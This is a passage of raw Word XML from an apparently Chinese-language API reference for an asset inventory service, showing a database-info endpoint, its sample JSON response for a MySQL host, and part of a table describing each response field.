            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17ED91B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="424FFC9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B1497" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05719A82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724122CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "a4a6b8074259377e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.199.200",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.199.200",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.199.200",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "ubuntu",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "5.7.19-0ubuntu0.16.04.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 3306,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protoType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bindIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>confPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>my.cnf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ubuntu.log",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dataDir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pluginDir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/plugin/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rest": "false",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "auth": "disabled",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "web": "false",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 60010,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0.0.0.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>regionServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["localhost"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "MSSQLSERVER_1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>auditLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysLogPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\Program Files\Microsoft SQL Server\MSSQL\data\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mastlog.ldf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mainDbPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\Program Files\Microsoft SQL Server\MSSQL\data\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>master.mdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0E771"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452"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FCC2CE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A1BB34B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33BA0489" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="024CCFC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57CB5D6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E446D7C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46E2EED6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF15093" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66ACE028" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="112046AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="579C1706" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4228F395" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3815642F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B13CBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5573D415" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F2981AE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A2C2284" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A34D38F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47A4D1DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1913FEFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31855DA9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6660C747" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C9CB2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D847C20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E9ABE5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="11E32770" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6466E380" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A328DCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6076C551" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="477C9815" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F86811E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="526CA3F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CDA2D7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4910058D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06B1D6B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="561BDBF1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="161451EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="249734C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57D0AE07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BB1266B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AF50283" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05D19D2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="558754AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43C8A427" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="034E3933" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F57A27B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="546E4324" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2512AE0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58ABC066" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
